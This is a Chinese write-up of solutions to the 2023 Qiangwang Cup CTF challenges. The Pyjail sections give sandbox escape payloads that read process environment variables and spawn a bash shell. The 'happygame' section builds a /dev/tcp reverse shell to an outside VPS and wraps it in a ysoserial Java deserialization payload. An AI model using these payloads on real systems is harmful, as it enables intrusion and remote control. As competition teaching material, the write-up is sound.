第七届“强网杯”全国安全挑战赛2023.12.16~2023.12.17
文章目录
- 【Misc】
- Pyjail ! It's myFILTER !!!- easyfuzz- 谍影重重2.0- 签到- Pyjail ! It's myRevenge !!!- - server_8F6C72124774022B.py- 问卷调查
- 【Reverse】
- ezre
- 【Web】
- happygame
- 【强网先锋】
- 石头剪刀布- Trie- SpeedUp- ezre- ez_fmt- Babyre
【Misc】
Pyjail ! It’s myFILTER !!!
nc连接后我们先来看看
┌──(root㉿penetration)-[/]
└─# nc 8.147.129.5 40072
_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _
| __ \(_)(_)||||_ _||()| ____|_ _|||__ __| ____| __ \|||||__)| _ _ __ _ _||||||||_|/ ___ _ __ ___ _ _||__ ||||||||__ ||__)||||| ___/ |||||/ _`|||||||| __| / __|| '_ ` _ \|||| __|||||||| __|| _ / |||||||_||||(_|||||_| _||_||_ \__ \|||||||_||| _||_||____||||____||\\|_|_||_|\__, |||\__,_|_|_|(_)|_____|\__||___/ |_||_||_|\__, |_||_____|______|_||______|_|\_\(_|_)
__/ |/ | __/ ||___/__/ |___/
Python Version:python3.10
Source Code:
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
print("Player! It's already banned!")
pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback
vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir= blacklist_fun_callback
getattr = blacklist_fun_callback
exec= blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
blacklist_words =["subprocess",
"os",
"code",
"interact",
"pty",
"pdb",
"platform",
"importlib",
"timeit",
"imp",
"commands",
"popen",
"load_module",
"spawn",
"system",
"/bin/sh",
"/bin/bash",
"flag",
"eval",
"exec",
"compile",
"input",
"vars",
"attr",
"dir",
"getattr""__import__",
"__builtins__",
"__getattribute__",
"__class__",
"__base__",
"__subclasses__",
"__getitem__",
"__self__",
"__globals__",
"__init__",
"__name__",
"__dict__",
"._module",
"builtins",
"breakpoint",
"import",
]
def my_filter(input_code):
forxin blacklist_words:
if x in input_code:
return False
return True
while'{'in input_code and '}'in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code)<65:
input_code = eval(f"f'{input_code}'")
else:
print("Player! Please obey the filter rules which I set!")
Can u input your code to escape >
分析一下:
import code, os, subprocess
import pty
defblacklist_fun_callback(*args):print("Player! It's already banned!")
pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback
vars= blacklist_fun_callback
attr = blacklist_fun_callback
dir= blacklist_fun_callback
getattr= blacklist_fun_callback
exec= blacklist_fun_callback
__import__= blacklist_fun_callback
compile= blacklist_fun_callback
breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code =input("Can u input your code to escape > ")
blacklist_words =["subprocess","os","code","interact","pty","pdb","platform","importlib","timeit","imp","commands","popen","load_module","spawn","system","/bin/sh","/bin/bash","flag","eval","exec","compile","input","vars","attr","dir","getattr""__import__","__builtins__","__getattribute__","__class__","__base__","__subclasses__","__getitem__","__self__","__globals__","__init__","__name__","__dict__","._module","builtins","breakpoint","import",]defmy_filter(input_code):for x in blacklist_words:if x in input_code:returnFalsereturnTruewhile'{'in input_code and'}'in input_code and input_code.isascii()and my_filter(input_code)and"eval"notin input_code andlen(input_code)<65:
input_code =eval(f"f'{input_code}'")else:print("Player! Please obey the filter rules which I set!")
主要目的是创建一个安全的环境,让用户在其中执行他们的代码,同时防止他们执行可能会破坏系统或获取敏感信息的代码。
- 首先导入了一些Python模块,如
code
,os
,subprocess
和pty
,然后定义了一个名为blacklist_fun_callback
的函数,该函数只是打印一条消息,表示某个功能已被禁用。 - 然后,将一些可能被恶意利用的函数和方法(如
os.system
,os.popen
,subprocess.Popen
,subprocess.call
等)替换为blacklist_fun_callback
,如果用户试图使用这些函数,他们只会看到一条消息,而不会实际执行任何操作。 - 接下来,删除了所有引用的模块和
blacklist_fun_callback
函数,以防止用户直接访问它们。 - 然后,提示用户输入他们想要执行的代码,并将其存储在
input_code
变量中。 - 然后定义了一个名为
blacklist_words
的列表,其中包含一些可能被恶意利用的关键字。 my_filter
函数接受用户输入的代码,并检查它是否包含blacklist_words
列表中的任何关键字。如果包含,函数返回False
,否则返回True
。- 在一个while循环中执行用户的代码,只要它满足一些条件(如不包含
{
或}
,是ASCII字符,不包含blacklist_words
列表中的任何关键字,长度小于65等)。如果用户的代码不满足这些条件,代码将打印一条消息,提示用户遵守过滤规则。
然后尝试了好多方法,后来想着能不能直接读取环境变量,因为我自己出题的时候就经常忘记把环境变量
flag=not flag
。最后payload:
{print(open("/proc/1/environ").read())}
easyfuzz
┌──(root㉿penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes):
一开始我也没明白什么意思,然后随便输了点东西
┌──(root㉿penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1in the coverage, you will win!
Enter a string (should be less than 10 bytes):
大致明白了是要跟
000000000
相同的位数:
┌──(root㉿penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1in the coverage, you will win!
Enter a string (should be less than 10 bytes): 222222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1in the coverage, you will win!
Enter a string (should be less than 10 bytes): df2222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1in the coverage, you will win!
Enter a string (should be less than 10 bytes): 111111111
Here is your code coverage: 110000000
Please try again. If you can reach all 1in the coverage, you will win!
Enter a string (should be less than 10 bytes):
发现规律是前面两个可以是任意的字母或数字,后面就要一个个去试了
xxqwbGood
qwb{YouKnowHowToFuzz!}
谍影重重2.0
提供了一个
attach.pcapng
文件,根据题目内容以及通过观察数据包的话是ADS-B数据解析。
为了方便处理我们把它转换成
JSON
格式
在ADS-B (Automatic Dependent Surveillance-Broadcast) 系统中,飞机广播的信息被编码为多种不同的消息类型,每种类型的消息都有一个特定的类型码(Type Code)。这些类型码用于区分消息中包含的数据类型,例如飞机的身份、位置、速度等。
根据ADS-B协议的规范来的。具体来说:
- 类型码19通常用于表示地面速度信息。
- 类型码20到22用于表示空中速度信息。
这些类型码定义了消息中包含的数据字段,以及如何解析这些字段以获取飞机的速度和航向等信息。
这些信息通常可以在ADS-B协议的官方文档或相关的航空通信标准文档中找到。例如,ICAO(国际民用航空组织)的文档就详细描述了ADS-B消息的格式和内容,包括不同类型码的含义。
在处理ADS-B数据时,解析器会根据这些类型码来解析消息内容,并提取出相应的飞机速度信息。因此,通过检查类型码来确定哪些消息包含了速度信息,并据此提取和分析数据。
import json
import pyModeS as pms
import hashlib
# 打开并读取json文件withopen('attach.json','r', encoding='utf-8')asfile:
data = json.load(file)# 初始化一个空列表来存储信息
info =[]# 遍历json数据中的每个数据包for packet in data:# 检查数据包是否包含'tcp'层if'layers'in packet['_source']and'tcp'in packet['_source']['layers']:
tcp_layer = packet['_source']['layers']['tcp']# 检查'tcp'层是否包含有效载荷if'tcp.payload'in tcp_layer:# 如果有,将其添加到info列表中
tcp_payload = tcp_layer['tcp.payload'].replace(':','')
info.append(tcp_payload)# 初始化一个空列表来存储飞机数据
planes_data =[]# 遍历info列表中的每个元素for i in info:# 提取出有效载荷中的消息部分
msg = i[18:]# 检查消息的类型码是否在19到22之间(这些类型码对应的是飞机的速度信息)if pms.adsb.typecode(msg)>=19and pms.adsb.typecode(msg)<=22:# 如果是,提取出飞机的ICAO代码和速度信息
icao = pms.adsb.icao(msg)
velocity_info = pms.adsb.velocity(msg)
speed, track, vertical_rate, _ = velocity_info
# 将这些信息存储在一个字典中,并将该字典添加到planes_data列表中
plane_info ={"icao": icao,"speed": speed,"track": track,"vertical_rate": vertical_rate
}
planes_data.append(plane_info)# 找出速度最快的飞机
fastest_plane =max(planes_data, key=lambda x: x['speed'])# 打印出该飞机的ICAO代码的MD5哈希值print("flag{"+hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest()+"}")
签到
flag{welcome_to_qwb_2023}
Pyjail ! It’s myRevenge !!!
┌──(root㉿penetration)-[/]
└─# nc 8.147.133.154 29942
_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _
| __ \(_)(_)||||_ _||()| ____|_ _|||__ __| ____| __ \|||||__)| _ _ __ _ _||||||||_|/ ___ _ __ ___ _ _||__ ||||||||__ ||__)||||| ___/ |||||/ _`|||||||| __| / __|| '_ ` _ \|||| __|||||||| __|| _ / |||||||_||||(_|||||_| _||_||_ \__ \|||||||_||| _||_||____||||____||\\|_|_||_|\__, |||\__,_|_|_|(_)|_____|\__||___/ |_||_||_|\__, |_||_____|______|_||______|_|\_\(_|_)
__/ |/ | __/ ||___/__/ |___/
Python Version:python3.10
Source Code:
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
print("Player! It's already banned!")
pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback
vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir= blacklist_fun_callback
getattr = blacklist_fun_callback
exec= blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
blacklist_words_var_name_fake_in_local_real_in_remote =["subprocess",
"os",
"code",
"interact",
"pty",
"pdb",
"platform",
"importlib",
"timeit",
"imp",
"commands",
"popen",
"load_module",
"spawn",
"system",
"/bin/sh",
"/bin/bash",
"flag",
"eval",
"exec",
"compile",
"input",
"vars",
"attr",
"dir",
"getattr""__import__",
"__builtins__",
"__getattribute__",
"__class__",
"__base__",
"__subclasses__",
"__getitem__",
"__self__",
"__globals__",
"__init__",
"__name__",
"__dict__",
"._module",
"builtins",
"breakpoint",
"import",
]
def my_filter(input_code):
forxin blacklist_words_var_name_fake_in_local_real_in_remote:
if x in input_code:
return False
return True
while'{'in input_code and '}'in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code)<65:
input_code = eval(f"f'{input_code}'")
else:
print("Player! Please obey the filter rules which I set!")
Can u input your code to escape >
先来分析一下:
import code, os, subprocess
import pty
defblacklist_fun_callback(*args):print("Player! It's already banned!")
pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback
vars= blacklist_fun_callback
attr = blacklist_fun_callback
dir= blacklist_fun_callback
getattr= blacklist_fun_callback
exec= blacklist_fun_callback
__import__= blacklist_fun_callback
compile= blacklist_fun_callback
breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code =input("Can u input your code to escape > ")
blacklist_words_var_name_fake_in_local_real_in_remote =["subprocess","os","code","interact","pty","pdb","platform","importlib","timeit","imp","commands","popen","load_module","spawn","system","/bin/sh","/bin/bash","flag","eval","exec","compile","input","vars","attr","dir","getattr""__import__","__builtins__","__getattribute__","__class__","__base__","__subclasses__","__getitem__","__self__","__globals__","__init__","__name__","__dict__","._module","builtins","breakpoint","import",]defmy_filter(input_code):for x in blacklist_words_var_name_fake_in_local_real_in_remote:if x in input_code:returnFalsereturnTruewhile'{'in input_code and'}'in input_code and input_code.isascii()and my_filter(input_code)and"eval"notin input_code andlen(input_code)<65:
input_code =eval(f"f'{input_code}'")else:print("Player! Please obey the filter rules which I set!")
大致可以是一个安全性过滤器,它的主要目的是防止用户执行一些可能会对系统造成危害的操作。这是通过在代码中禁止一些可能会被恶意利用的函数和模块来实现的。
首先,定义了一个名为
blacklist_fun_callback
的函数,它会在被调用时打印一条消息。然后,将一些可能被恶意利用的函数和模块,如
os.system
、
subprocess.Popen
等,都替换为这个函数。这样,如果用户试图使用这些函数或模块,就会失败,而只会看到定义的消息。
接下来,定义了一个名为
blacklist_words_var_name_fake_in_local_real_in_remote
的列表,其中包含了一些可能会被恶意利用的关键词。这些关键词包括一些可能会被用来执行恶意代码的函数名、模块名和路径等。
然后,定义了一个名为
my_filter
的函数,它会检查用户输入的代码中是否包含这些关键词。如果包含,函数将返回False,否则返回True。
最后,使用一个while循环来接收并处理用户的输入。只有当用户的输入满足所有的条件(不包含大括号,只包含ASCII字符,不包含黑名单中的关键词,长度小于65,且不包含"eval")时,输入的代码才会被执行。否则,将打印一条消息提示用户遵守过滤规则。
目标很明确,就是绕过代码中的安全过滤器,利用Python的动态特性和字符串格式化来绕过过滤器的限制以执行任意代码并最终获取shell访问。
首先可以清空
blacklist_words_var_name_fake_in_local_real_in_remote
列表,
my_filter
函数就不会再过滤任何输入。假设黑名单被清空,那么此时就可以使用
eval
函数,为了保险起见要通过拼接字符串来获取
eval
函数,绕过直接使用
eval
关键词的限制。然后通过
__import__
函数导入
os
模块绕过直接使用
os
关键词的限制,使用
os.execv
函数执行
/bin/bash
打开一个新的
bash shell
。最后payload:
{list(locals().values())[-2].clear()}'+'\"{'+'in'+'put()'+'}\"
{__builtins__.__dict__["ev"+"al"](input())}{__builtins__.__dict__["__import__"]("os").execv("/bin/bash",["/bin/bash"])}
server_8F6C72124774022B.py
import code, os, subprocess
import pty
WELCOME ='''
_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _
| __ \ (_) (_) | | | |_ _| | ( ) | ____|_ _| | |__ __| ____| __ \ | | |
| |__) | _ _ __ _ _| | | | | | | |_|/ ___ _ __ ___ _ _| |__ | | | | | | | |__ | |__) | | | |
| ___/ | | || |/ _` | | | | | | | | __| / __| | '_ ` _ \| | | | __| | | | | | | | __| | _ / | | |
| | | |_| || | (_| | | | |_| _| |_| |_ \__ \ | | | | | | |_| | | _| |_| |____| | | |____| | \ \ |_|_|
|_| \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_| |_____|______|_| |______|_| \_\ (_|_)
__/ |/ | __/ |
|___/__/ |___/
'''
SOURCE_CODE ='''
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
print("Player! It's already banned!")
pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback
vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
blacklist_words_var_name_fake_in_local_real_in_remote = [
"subprocess",
"os",
"code",
"interact",
"pty",
"pdb",
"platform",
"importlib",
"timeit",
"imp",
"commands",
"popen",
"load_module",
"spawn",
"system",
"/bin/sh",
"/bin/bash",
"flag",
"eval",
"exec",
"compile",
"input",
"vars",
"attr",
"dir",
"getattr"
"__import__",
"__builtins__",
"__getattribute__",
"__class__",
"__base__",
"__subclasses__",
"__getitem__",
"__self__",
"__globals__",
"__init__",
"__name__",
"__dict__",
"._module",
"builtins",
"breakpoint",
"import",
]
def my_filter(input_code):
for x in blacklist_words_var_name_fake_in_local_real_in_remote:
if x in input_code:
return False
return True
while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
input_code = eval(f"f'{input_code}'")
else:
print("Player! Please obey the filter rules which I set!")
'''defblacklist_fun_callback(*args):print("Player! It's already banned!")
pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback
vars= blacklist_fun_callback
attr = blacklist_fun_callback
dir= blacklist_fun_callback
getattr= blacklist_fun_callback
exec= blacklist_fun_callback
__import__= blacklist_fun_callback
compile= blacklist_fun_callback
breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
print(WELCOME)print("Python Version:python3.10")print("Source Code:")print(SOURCE_CODE)
input_code =input("Can u input your code to escape > ")
b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120 =["subprocess","os","code","interact","pty","pdb","platform","importlib","timeit","imp","commands","popen","load_module","spawn","system","/bin/sh","/bin/bash","flag","eval","exec","compile","input","vars","attr","dir","getattr""__import__","__builtins__","__getattribute__","__class__","__base__","__subclasses__","__getitem__","__self__","__globals__","__init__","__name__","__dict__","._module","builtins","breakpoint","import",]defmy_filter(input_code):for x in b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120:if x in input_code:returnFalsereturnTruewhile'{'in input_code and'}'in input_code and input_code.isascii()and my_filter(input_code)and"eval"notin input_code andlen(input_code)<65:
input_code =eval(f"f'{input_code}'")else:print("Player! Please bypass my filter !")
问卷调查
flag{see_you_again_qwb_s8}
【Reverse】
ezre
一开始想随便看看的,但是后来发现了什么
这不就是SM4加密
密钥:
01 23456789 AB CD EF 01 23456789 AB CD EF
密文:
06 751947166388 7C
8B 6655 FF 3F 7D 0D 4A
F5 D2 4E 38 3F E9 C2 DE
DB 7C 7F 6F 74 B1 1F 3C
解密:
66 6c 6167 7b 6833 6b 6b 30 5f 773072 6c 64 5f 73757233 5f 33 6e 30756768 7d 00 00 00
看到关键的
666c
就是
fl
的前缀了,十六进制转字符串:
flag{h3kk0_w0rld_sur3_3n0ugh}
【Web】
happygame
grpcui.exe
。然后顺带准备一台VPS(139.159.215.68)。
/bin/bash -i>& /dev/tcp/139.159.215.68/6767 0>&1
base64编码:
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==
然后:
CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==}|{base64,-d}|{bash,-i}"| base64 |tr-d"\n"
┌──(root㉿penetration)-[/]
└─# java -jar ysoserial-main-cff1edf282-1.jar CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGliYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtSUM5a1pYWXZkR053THpFek9TNHhOVGt1TWpFMUxqWTRMelkzTmpjZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==
Terminal执行:
grpcui.exe -plaintext8.147.129.191:26804
选择
Raw Request
,
Request payload
:
{"serializeData":"rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGliYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtSUM5a1pYWXZkR053THpFek9TNHhOVGt1TWpFMUxqWTRMelkzTmpjZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA=="}
VPS上进行监听:
root@ecs-74b2:~# nc -lvnp 6767
Listening on 0.0.0.0 6767
然后点击
Invoke
回到服务器上就可以正常反弹shell了:
【强网先锋】
石头剪刀布
从
sklearn.naive_bayes
中的
MultinomialNB
中看出是朴素贝叶斯分类器,用于训练模型。
from pwn import*
p=remote("8.147.131.39",28434)defZ():
p.recv()
p.sendline(b'0')defO():
p.recv()
p.sendline(b'1')defT():
p.recv()
p.sendline(b'2')whileTrue:
Z()
Z()
Z()
Z()
Z()
O()
O()
T()
T()
Z()
O()
T()
Z()
T()
Z()
T()
O()
Z()
T()
O()
O()
Z()
Z()
O()
O()
O()
T()
T()
T()
Z()
Z()
O()
T()
Z()
Z()
T()
T()
O()
O()
Z()
O()
T()
Z()
O()
Z()
O()
Z()
T()
O()
T()
T()
Z()
T()
O()
Z()
Z()
T()
T()
O()
O()
Z()
O()
Z()
O()
T()
Z()
T()
Z()
T()
O()
Z()
T()
O()
Z()
Z()
O()
O()
O()
T()
T()
O()
Z()
O()
T()
T()
Z()
O()
T()
Z()
O()
T()# 接收服务器的响应
b=p.recv()# 将响应的字节字符串解码为utf-8格式的字符串
decoded_string4 = b.decode('utf-8')print(decoded_string4)# 向服务器发送请求
p.sendline(b'2')
a=p.recv()
decoded_string = a.decode('utf-8')print(decoded_string)
Trie
题目让我想到Trie树。逆向观察后的大致思路就是利用Trie树的特性,通过发送特定的IP地址来触发服务器端的某种漏洞,然后从服务器的响应中提取出敏感信息。
根据思路调整,最后exp:
from pwn import*# context.log_level = "debug"
context.terminal =["/bin/tmux","sp","-h"]
context(arch='amd64', os='linux')
flag =''defadd(sh, data):
sh.sendlineafter("4. Quit.","1")
sh.sendlineafter("destination IP:", data)
sh.sendlineafter("next hop:", data)defshow(sh, data):
sh.sendlineafter("4. Quit.","2")
sh.sendlineafter("destination IP:", data)
sh.recvuntil("The next hop is ")
flag_part = sh.recvuntil('\n', drop=True).decode('utf-8')
flag_part = flag_part.split('.')[::-1]return tostring(flag_part)defget_flag(sh):
sh.sendlineafter("4. Quit.","3")deftostring(t_flag):return''.join(chr(int(i,10))for i in t_flag)defpadding():
sh = remote("47.104.150.173",1337)
add(sh,"1.2.3.4")
add(sh,"2.3.4.5")return sh
defretrieve_flag(ip):global flag
sh = padding()
add(sh, ip)
get_flag(sh)
flag += show(sh, ip)print(flag)defmain():
ips =["129.2.3.4","193.2.3.4","225.2.3.4","241.2.3.4","249.2.3.4","253.2.3.4","255.2.3.4","254.2.3.4","254.130.3.4","254.194.3.4"]for ip in ips:
retrieve_flag(ip)if __name__ =="__main__":
main()
SpeedUp
我们先看一下题目:
x
=
(
2
27
)
!
x=(2^{27})!
x=(227)!
deff(x):
res =0while x:
res += x %10
x //=10return res
意思是求2的27次方的阶乘所获得的每一位数字之和。
当时想的是直接手搓,但又不大可能,后来在网上找了好久发现在
OEIS
直接记录了:
https://oeis.org/A244060
然后看他的list:
import hashlib
n=4495662081
n_str =str(n)# 创建一个sha256哈希对象
sha256_hash = hashlib.sha256()# 提供要哈希的数据
sha256_hash.update(n_str.encode('utf-8'))# 获取哈希值
hash_value = sha256_hash.hexdigest()print("flag{"+hash_value+"}")
flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}
ezre
一眼看到
main
函数:
